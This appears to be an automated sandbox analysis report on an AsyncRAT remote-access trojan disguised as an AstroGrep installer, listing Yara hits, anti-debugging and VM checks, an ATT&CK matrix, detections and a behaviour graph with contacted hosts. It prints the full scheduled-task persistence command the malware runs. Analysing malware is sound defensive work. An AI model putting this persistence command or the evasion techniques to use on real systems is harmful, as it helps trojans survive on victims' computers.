                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion:

                            barindex
                            Yara detected AsyncRATShow sources
                            Source: Yara matchFile source: ms.exe, type: SAMPLE
                            Source: Yara matchFile source: 17.2.astro-grep.exe.430000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.ms.exe.a3f330.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.astro-grep.exe.770000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.0.astro-grep.exe.430000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.ASTRO-GREP.EXE.2a4e31c.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.0.astro-grep.exe.770000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.ASTRO-GREP.EXE.2a4e31c.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.0.ms.exe.a3f330.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.0.ms.exe.a30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.0.ms.exe.a3f330.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.ms.exe.a30000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.ms.exe.a3f330.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000002.250713765.0000000002A4E000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000000.253043295.0000000000772000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.197769647.00000000005F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.250001680.00000000005F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000000.195464436.0000000000A3F000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.310239259.0000000000432000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000000.259955019.0000000000432000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.460832273.0000000000772000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: astro-grep.exe PID: 748, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: astro-grep.exe PID: 2792, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ASTRO-GREP.EXE PID: 5416, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\astro-grep.exe, type: DROPPED
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                            Source: astro-grep.exe, ms.exeBinary or memory string: SBIEDLL.DLL
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEDropped PE file which has not been started: C:\Program Files (x86)\AstroGrep\ICSharpCode.AvalonEdit.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEDropped PE file which has not been started: C:\Program Files (x86)\AstroGrep\AstroGrep.Common.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEDropped PE file which has not been started: C:\Program Files (x86)\AstroGrep\NLog.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEDropped PE file which has not been started: C:\Program Files (x86)\AstroGrep\AstroGrep.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEDropped PE file which has not been started: C:\Program Files (x86)\AstroGrep\libAstroGrep.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEDropped PE file which has not been started: C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEDropped PE file which has not been started: C:\Program Files (x86)\AstroGrep\Uninstall.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE TID: 6128Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exe TID: 4840Thread sleep time: -45000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exe TID: 4920Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile Volume queried: C:\Program Files (x86) FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile Volume queried: C:\Program Files (x86) FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_00406033 FindFirstFileA,FindClose,5_2_00406033
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004055D1
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_00402688 FindFirstFileA,5_2_00402688
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: ASTRO-GREP.EXE, 00000003.00000002.251607901.0000000005580000.00000002.00000001.sdmp, astro-grep.exe, 0000000D.00000002.465209540.0000000005630000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                            Source: ms.exeBinary or memory string: vmware
                            Source: ASTRO-GREP.EXE, 00000003.00000002.251607901.0000000005580000.00000002.00000001.sdmp, astro-grep.exe, 0000000D.00000002.465209540.0000000005630000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                            Source: ASTRO-GREP.EXE, 00000003.00000002.251607901.0000000005580000.00000002.00000001.sdmp, astro-grep.exe, 0000000D.00000002.465209540.0000000005630000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                            Source: astro-grep.exe, 0000000D.00000002.465070597.00000000050B0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: ASTRO-GREP.EXE, 00000003.00000002.251607901.0000000005580000.00000002.00000001.sdmp, astro-grep.exe, 0000000D.00000002.465209540.0000000005630000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging:

                            barindex
                            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXECode function: 3_2_00F2BC64 CheckRemoteDebuggerPresent,3_2_00F2BC64
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\Desktop\ms.exeCode function: 1_2_00A33BEC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00A33BEC
                            Source: C:\Users\user\Desktop\ms.exeCode function: 1_2_00A36260 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00A36260
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\ms.exeCode function: 1_2_00A34991 SetUnhandledExceptionFilter,1_2_00A34991
                            Source: C:\Users\user\Desktop\ms.exeCode function: 1_2_00A33BEC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00A33BEC
                            Source: C:\Users\user\Desktop\ms.exeCode function: 1_2_00A32701 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00A32701
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\ms.exeProcess created: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE 'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE' Jump to behavior
                            Source: C:\Users\user\Desktop\ms.exeProcess created: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE 'C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE' Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' & exitJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmp7B21.tmp.bat''Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3 Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\astro-grep.exe 'C:\Users\user\AppData\Roaming\astro-grep.exe' Jump to behavior
                            Source: astro-grep.exe, 0000000D.00000002.461901271.0000000001490000.00000002.00000001.sdmpBinary or memory string: Program Manager
                            Source: astro-grep.exe, 0000000D.00000002.461901271.0000000001490000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                            Source: astro-grep.exe, 0000000D.00000002.461901271.0000000001490000.00000002.00000001.sdmpBinary or memory string: Progman
                            Source: astro-grep.exe, 0000000D.00000002.461901271.0000000001490000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEQueries volume information: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXEQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeQueries volume information: C:\Users\user\AppData\Roaming\astro-grep.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\astro-grep.exeQueries volume information: C:\Users\user\AppData\Roaming\astro-grep.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\ms.exeCode function: 1_2_00A35173 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_00A35173
                            Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXECode function: 5_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,5_2_00405D51
                            Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings:

                            barindex
                            Yara detected AsyncRATShow sources
                            Source: Yara matchFile source: ms.exe, type: SAMPLE
                            Source: Yara matchFile source: 17.2.astro-grep.exe.430000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.0.ASTRO-GREP.EXE.5f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.ms.exe.a3f330.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.astro-grep.exe.770000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.ASTRO-GREP.EXE.5f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.0.astro-grep.exe.430000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.ASTRO-GREP.EXE.2a4e31c.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.0.astro-grep.exe.770000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.ASTRO-GREP.EXE.2a4e31c.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.0.ms.exe.a3f330.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.0.ms.exe.a30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.0.ms.exe.a3f330.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.ms.exe.a30000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 1.2.ms.exe.a3f330.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000002.250713765.0000000002A4E000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000000.253043295.0000000000772000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.197769647.00000000005F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.250001680.00000000005F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000000.195464436.0000000000A3F000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.310239259.0000000000432000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000000.259955019.0000000000432000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.460832273.0000000000772000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: astro-grep.exe PID: 748, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: astro-grep.exe PID: 2792, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ASTRO-GREP.EXE PID: 5416, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\astro-grep.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid AccountsWindows Management Instrumentation1Scheduled Task/Job2Access Token Manipulation1Disable or Modify Tools1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                            Default AccountsScripting1Registry Run Keys / Startup Folder1Process Injection12Scripting1LSASS MemoryFile and Directory Discovery3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain AccountsNative API1Logon Script (Windows)Scheduled Task/Job2Obfuscated Files or Information111Security Account ManagerSystem Information Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local AccountsCommand and Scripting Interpreter2Logon Script (Mac)Registry Run Keys / Startup Folder1Software Packing11NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
                            Cloud AccountsScheduled Task/Job2Network Logon ScriptNetwork Logon ScriptMasquerading2LSA SecretsSecurity Software Discovery231SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion41Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncVirtualization/Sandbox Evasion41Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 450276 Sample: ms.bin Startdate: 17/07/2021 Architecture: WINDOWS Score: 52 60 Antivirus / Scanner detection for submitted sample 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 Yara detected AsyncRAT 2->64 66 5 other signatures 2->66 8 ms.exe 3 2->8         started        11 astro-grep.exe 15 2 2->11         started        process3 dnsIp4 36 C:\Users\user\AppData\...\ASTRO-GREP.EXE, PE32 8->36 dropped 38 C:\Users\user\...\ASTROGREP_SETUP_V4.4.7.EXE, PE32 8->38 dropped 15 ASTRO-GREP.EXE 7 8->15         started        19 ASTROGREP_SETUP_V4.4.7.EXE 12 46 8->19         started        50 185.195.232.251, 49728, 49729, 49735 ESAB-ASSE Sweden 11->50 52 pastebin.com 104.23.98.190, 443, 49727 CLOUDFLARENETUS United States 11->52 70 Antivirus detection for dropped file 11->70 72 Machine Learning detection for dropped file 11->72 file5 signatures6 process7 file8 40 C:\Users\user\AppData\...\astro-grep.exe, PE32 15->40 dropped 54 Antivirus detection for dropped file 15->54 56 Machine Learning detection for dropped file 15->56 58 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 15->58 21 cmd.exe 1 15->21         started        24 cmd.exe 1 15->24         started        42 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 19->42 dropped 44 C:\Users\user\AppData\Local\...\System.dll, PE32 19->44 dropped 46 C:\Users\user\AppData\Local\...\StartMenu.dll, PE32 19->46 dropped 48 8 other files (none is malicious) 19->48 dropped signatures9 process10 signatures11 68 Uses schtasks.exe or at.exe to add and modify task schedules 21->68 26 conhost.exe 21->26         started        28 schtasks.exe 1 21->28         started        30 astro-grep.exe 2 24->30         started        32 conhost.exe 24->32         started        34 timeout.exe 1 24->34         started        process12

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            ms.exe78%VirustotalBrowse
                            ms.exe100%AviraTR/Dropper.Gen
                            ms.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE100%AviraTR/Dropper.Gen
                            C:\Users\user\AppData\Roaming\astro-grep.exe100%AviraTR/Dropper.Gen
                            C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\astro-grep.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exe0%VirustotalBrowse
                            C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exe0%MetadefenderBrowse
                            C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exe0%ReversingLabs
                            C:\Program Files (x86)\AstroGrep\AstroGrep.Common.dll0%MetadefenderBrowse
                            C:\Program Files (x86)\AstroGrep\AstroGrep.Common.dll0%ReversingLabs
                            C:\Program Files (x86)\AstroGrep\AstroGrep.exe2%MetadefenderBrowse
                            C:\Program Files (x86)\AstroGrep\AstroGrep.exe0%ReversingLabs
                            C:\Program Files (x86)\AstroGrep\ICSharpCode.AvalonEdit.dll0%MetadefenderBrowse
                            C:\Program Files (x86)\AstroGrep\ICSharpCode.AvalonEdit.dll0%ReversingLabs
                            C:\Program Files (x86)\AstroGrep\NLog.dll0%MetadefenderBrowse
                            C:\Program Files (x86)\AstroGrep\NLog.dll0%ReversingLabs
                            C:\Program Files (x86)\AstroGrep\Uninstall.exe5%MetadefenderBrowse
                            C:\Program Files (x86)\AstroGrep\Uninstall.exe2%ReversingLabs
                            C:\Program Files (x86)\AstroGrep\libAstroGrep.dll0%MetadefenderBrowse
                            C:\Program Files (x86)\AstroGrep\libAstroGrep.dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE5%MetadefenderBrowse
                            C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE4%ReversingLabs

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
